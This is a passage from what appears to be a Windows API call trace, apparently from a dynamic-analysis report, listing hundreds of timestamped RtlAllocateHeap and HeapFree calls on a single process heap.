RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x28da0f0 [0269.198] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x28ed300 [0269.198] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2900510 [0269.199] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x698) returned 0x558910 [0269.199] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56c5f0 | out: hHeap=0x540000) returned 1 [0269.199] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2913720 [0269.199] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2926930 [0269.200] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2939b40 [0269.200] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x294cd50 [0269.201] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x295ff60 [0269.201] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2973170 [0269.202] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2986380 [0269.202] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2999590 [0269.202] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x29ac7a0 [0269.203] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x29bf9b0 [0269.203] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x29d2bc0 [0269.204] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x29e5dd0 [0269.205] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x29f8fe0 [0269.205] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2a0c1f0 [0269.206] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2a1f400 [0269.206] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2a32610 [0269.206] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2a45820 [0269.207] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2a58a30 [0269.207] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2a6bc40 [0269.208] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2a7ee50 [0269.209] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2a92060 [0269.209] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2aa5270 [0269.210] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2ab8480 [0269.210] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2acb690 [0269.211] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2ade8a0 [0269.211] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2af1ab0 [0269.211] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2b04cc0 [0269.212] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2b17ed0 [0269.212] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2b2b0e0 [0269.213] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2b3e2f0 [0269.213] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2b51500 [0269.214] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2b64710 [0269.214] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2b77920 [0269.215] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2b8ab30 [0269.215] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2b9dd40 [0269.216] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2bb0f50 [0269.216] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2bc4160 [0269.217] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2bd7370 [0269.217] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2bea580 [0269.218] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2bfd790 [0269.219] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2c109a0 [0269.219] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2c23bb0 [0269.219] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2c36dc0 [0269.220] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2c49fd0 [0269.221] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2c5d1e0 [0269.221] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2c703f0 [0269.222] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2c83600 [0269.222] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2c96810 [0269.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2ca9a20 [0269.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2cbcc30 [0269.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2ccfe40 [0269.223] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2ce3050 [0269.224] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2cf6260 [0269.224] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2d09470 [0269.346] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2d1c680 [0269.347] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2d2f890 [0269.347] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2d42aa0 [0269.348] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2d55cb0 [0269.348] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2d68ec0 [0269.349] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2d7c0d0 [0269.350] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2d8f2e0 [0269.350] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2da24f0 [0269.351] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2db5700 [0269.351] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2dc8910 [0269.351] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2df0080 [0269.354] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2e03290 [0269.355] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2e164a0 [0269.355] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2e296b0 [0269.356] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2e3c8c0 [0269.357] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2e4fad0 [0269.358] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9e0) returned 0x56c5f0 [0269.358] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558910 | out: hHeap=0x540000) returned 1 [0269.358] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2e62ce0 [0269.358] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2e75ef0 [0269.359] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2e89100 [0269.360] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2e9c310 [0269.361] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2eaf520 [0269.361] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2ec2730 [0269.362] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2ed5940 [0269.363] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2ee8b50 [0269.364] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2efbd60 [0269.364] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2f0ef70 [0269.365] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2f22180 [0269.366] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2f35390 [0269.367] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2f485a0 [0269.368] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2f5b7b0 [0269.368] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2f6e9c0 [0269.585] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56c5f0 | out: hHeap=0x540000) returned 1 [0274.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x577480 | out: hHeap=0x540000) returned 1 [0274.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597280 | out: hHeap=0x540000) returned 1 [0274.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5aa490 | out: hHeap=0x540000) returned 1 [0274.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5bd6a0 | out: hHeap=0x540000) returned 1 [0274.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d08b0 | out: hHeap=0x540000) returned 1 [0274.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5e3ac0 | out: hHeap=0x540000) returned 1 [0274.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5f6cd0 | out: hHeap=0x540000) returned 1 [0274.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x609ee0 | out: hHeap=0x540000) returned 1 [0274.931] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x61d0f0 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x1e60080 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x1e73290 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x1e864a0 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x1e996b0 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x1eac8c0 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x1ebfad0 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x1ed2ce0 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x1ee5ef0 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x1ef9100 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x1f0c310 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x1f1f520 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x1f32730 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x1ff0080 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2003290 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x20164a0 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x20296b0 | out: hHeap=0x540000) returned 1 [0274.932] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x203c8c0 | out: hHeap=0x540000) returned 1 [0274.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x204fad0 | out: hHeap=0x540000) returned 1 [0274.948] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2062ce0 | out: hHeap=0x540000) returned 1 [0274.948] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2075ef0 | out: hHeap=0x540000) returned 1 [0274.948] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2089100 | out: hHeap=0x540000) returned 1 [0274.948] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x209c310 | out: hHeap=0x540000) returned 1 [0274.948] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x20af520 | out: hHeap=0x540000) returned 1 [0274.948] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x20c2730 | out: hHeap=0x540000) returned 1 [0274.948] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x20d5940 | out: hHeap=0x540000) returned 1 [0274.948] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x20e8b50 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x20fbd60 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x210ef70 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2122180 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2135390 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x21485a0 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x215b7b0 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x216e9c0 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2181bd0 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2194de0 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x21a7ff0 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x21bb200 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x21ce410 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x21f0080 | out: hHeap=0x540000) returned 1 [0274.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2203290 | out: hHeap=0x540000) returned 1 [0275.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x22164a0 | out: hHeap=0x540000) returned 1 [0275.065] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x22296b0 | out: hHeap=0x540000) returned 1 [0275.065] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x223c8c0 | out: hHeap=0x540000) returned 1 [0275.065] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x224fad0 | out: hHeap=0x540000) returned 1 [0275.065] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2262ce0 | out: hHeap=0x540000) returned 1 [0275.065] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2275ef0 | out: hHeap=0x540000) returned 1 [0275.066] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2289100 | out: hHeap=0x540000) returned 1 [0275.066] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x229c310 | out: hHeap=0x540000) returned 1 [0275.066] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x22af520 | out: hHeap=0x540000) returned 1 [0275.066] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x22c2730 | out: hHeap=0x540000) returned 1 [0275.066] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x22d5940 | out: hHeap=0x540000) returned 1 [0275.066] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x22e8b50 | out: hHeap=0x540000) returned 1 [0275.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x22fbd60 | out: hHeap=0x540000) returned 1 [0275.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x230ef70 | out: hHeap=0x540000) returned 1 [0275.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2322180 | out: hHeap=0x540000) returned 1 [0275.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2335390 | out: hHeap=0x540000) returned 1 [0275.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x23485a0 | out: hHeap=0x540000) returned 1 [0275.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x235b7b0 | out: hHeap=0x540000) returned 1 [0275.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x236e9c0 | out: hHeap=0x540000) returned 1 [0275.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2381bd0 | out: hHeap=0x540000) returned 1 [0275.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2394de0 | out: hHeap=0x540000) returned 1 [0275.073] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x23a7ff0 | out: hHeap=0x540000) returned 1 [0275.077] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x23bb200 | out: hHeap=0x540000) returned 1 [0275.080] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x23ce410 | out: hHeap=0x540000) returned 1 [0275.080] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x23e1620 | out: hHeap=0x540000) returned 1 [0275.080] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x23f4830 | out: hHeap=0x540000) returned 1 [0275.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2407a40 | out: hHeap=0x540000) returned 1 [0275.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x241ac50 | out: hHeap=0x540000) returned 1 [0275.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x242de60 | out: hHeap=0x540000) returned 1 [0275.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2441070 | out: hHeap=0x540000) returned 1 [0275.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2454280 | out: hHeap=0x540000) returned 1 [0275.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2467490 | out: hHeap=0x540000) returned 1 [0275.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x247a6a0 | out: hHeap=0x540000) returned 1 [0275.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x248d8b0 | out: hHeap=0x540000) returned 1 [0275.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x24a0ac0 | out: hHeap=0x540000) returned 1 [0275.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x24b3cd0 | out: hHeap=0x540000) returned 1 [0275.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x24c6ee0 | out: hHeap=0x540000) returned 1 [0275.086] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x24da0f0 | out: hHeap=0x540000) returned 1 [0275.086] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x24ed300 | out: hHeap=0x540000) returned 1 [0275.086] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2500510 | out: hHeap=0x540000) returned 1 [0275.092] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2513720 | out: hHeap=0x540000) returned 1 [0275.092] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2526930 | out: hHeap=0x540000) returned 1 [0275.093] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2539b40 | out: hHeap=0x540000) returned 1 [0275.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x254cd50 | out: hHeap=0x540000) returned 1 [0275.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x255ff60 | out: hHeap=0x540000) returned 1 [0275.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2573170 | out: hHeap=0x540000) returned 1 [0275.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2586380 | out: hHeap=0x540000) returned 1 [0275.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2599590 | out: hHeap=0x540000) returned 1 [0275.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x25ac7a0 | out: hHeap=0x540000) returned 1 [0275.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x25bf9b0 | out: hHeap=0x540000) returned 1 [0275.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x25d2bc0 | out: hHeap=0x540000) returned 1 [0275.094] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x25f0080 | out: hHeap=0x540000) returned 1 [0275.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2603290 | out: hHeap=0x540000) returned 1 [0275.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x26164a0 | out: hHeap=0x540000) returned 1 [0275.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x26296b0 | out: hHeap=0x540000) returned 1 [0275.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x263c8c0 | out: hHeap=0x540000) returned 1 [0275.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x264fad0 | out: hHeap=0x540000) returned 1 [0275.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2662ce0 | out: hHeap=0x540000) returned 1 [0275.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2675ef0 | out: hHeap=0x540000) returned 1 [0275.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2689100 | out: hHeap=0x540000) returned 1 [0275.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x269c310 | out: hHeap=0x540000) returned 1 [0275.228] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x26af520 | out: hHeap=0x540000) returned 1 [0275.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x26c2730 | out: hHeap=0x540000) returned 1 [0275.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x26d5940 | out: hHeap=0x540000) returned 1 [0275.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x26e8b50 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x26fbd60 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x270ef70 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2722180 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2735390 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x27485a0 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x275b7b0 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x276e9c0 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2781bd0 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2794de0 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x27a7ff0 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x27bb200 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x27ce410 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x27e1620 | out: hHeap=0x540000) returned 1 [0275.234] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x27f4830 | out: hHeap=0x540000) returned 1 [0275.239] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2807a40 | out: hHeap=0x540000) returned 1 [0275.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x281ac50 | out: hHeap=0x540000) returned 1 [0275.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x282de60 | out: hHeap=0x540000) returned 1 [0275.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2841070 | out: hHeap=0x540000) returned 1 [0275.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2854280 | out: hHeap=0x540000) returned 1 [0275.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2867490 | out: hHeap=0x540000) returned 1 [0275.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x287a6a0 | out: hHeap=0x540000) returned 1 [0275.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x288d8b0 | out: hHeap=0x540000) returned 1 [0275.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x28a0ac0 | out: hHeap=0x540000) returned 1 [0275.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x28b3cd0 | out: hHeap=0x540000) returned 1 [0275.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x28c6ee0 | out: hHeap=0x540000) returned 1 [0275.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x28da0f0 | out: hHeap=0x540000) returned 1 [0275.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x28ed300 | out: hHeap=0x540000) returned 1 [0275.240] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2900510 | out: hHeap=0x540000) returned 1 [0275.246] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2913720 | out: hHeap=0x540000) returned 1 [0275.246] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2926930 | out: hHeap=0x540000) returned 1 [0275.246] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2939b40 | out: hHeap=0x540000) returned 1 [0275.246] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x294cd50 | out: hHeap=0x540000) returned 1 [0275.248] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x295ff60 | out: hHeap=0x540000) returned 1 [0275.248] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2973170 | out: hHeap=0x540000) returned 1 [0275.248] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2986380 | out: hHeap=0x540000) returned 1 [0275.248] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2999590 | out: hHeap=0x540000) returned 1 [0275.249] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x29ac7a0 | out: hHeap=0x540000) returned 1 [0275.249] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x29bf9b0 | out: hHeap=0x540000) 